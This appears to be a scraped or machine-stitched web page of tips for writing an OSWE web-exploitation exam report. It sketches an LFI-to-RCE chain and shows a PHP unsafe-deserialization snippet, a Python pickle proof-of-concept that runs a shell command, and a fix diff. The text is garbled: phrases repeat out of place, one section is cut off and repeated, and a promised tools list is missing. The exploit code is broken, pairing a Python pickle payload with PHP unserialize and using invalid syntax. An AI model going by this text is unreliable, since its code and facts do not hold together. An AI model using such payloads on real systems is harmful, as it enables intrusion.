Here’s a structured review of OSWE exam report work, based on common experiences from individuals who have taken the Offensive Security Web Expert (OSWE) certification.
Create a simple ASCII or Mermaid flowchart:
[HTTP Request] → [unsanitized $_GET['file']] → [file_get_contents()] → [LFI]
↓
[MySQL LOAD_FILE()] → [Credentials]
↓
[Admin Login] → [Upload bypass] → RCE
Don't write "Login bypass." Write: "Authentication Bypass via PHP Type Juggling (CWE-843)." Use the exact OWASP/CWE terminology. Examiners love this. oswe exam report work
4.1 Vulnerability Name & ID e.g., OSWE-01: PHP Object Injection leading to Remote Code Execution
4.2 Source Code Snippet (THE CRITICAL PART) Do not paste 100 lines. Paste 10 critical lines with line numbers. Here’s a structured review of OSWE exam report
// File: modules/auth/Login.php - Line 42
$user_data = unserialize($_COOKIE['user_prefs']); // <-- Unsafe deserialization
$role = $user_data['role'];
if ($role === 'admin')
$this->runHook($_GET['action']);
4.3 Proof of Concept (PoC) Exploit Code
# exploit.py
import requests, pickle, os
class RCE:
def __reduce__(self):
return (os.system, ('cat /flag',))
cookie = 'user_prefs': pickle.dumps(RCE())
requests.get('http://target/admin/dashboard', cookies=cookie)
4.4 Step-by-Step Exploitation Walkthrough Create a simple ASCII or Mermaid flowchart: [HTTP
4.5 Remediation (Code Fix) Show the exact line change in code.
- $user_data = unserialize($_COOKIE['user_prefs']);
+ $user_data = json_decode($_COOKIE['user_prefs'], true);
Experienced OSWE candidates use tools to speed up documentation:
However, do not over-automate. A script that generates a "report" without your analysis is worthless. The examiner needs to see your brain working through the source code.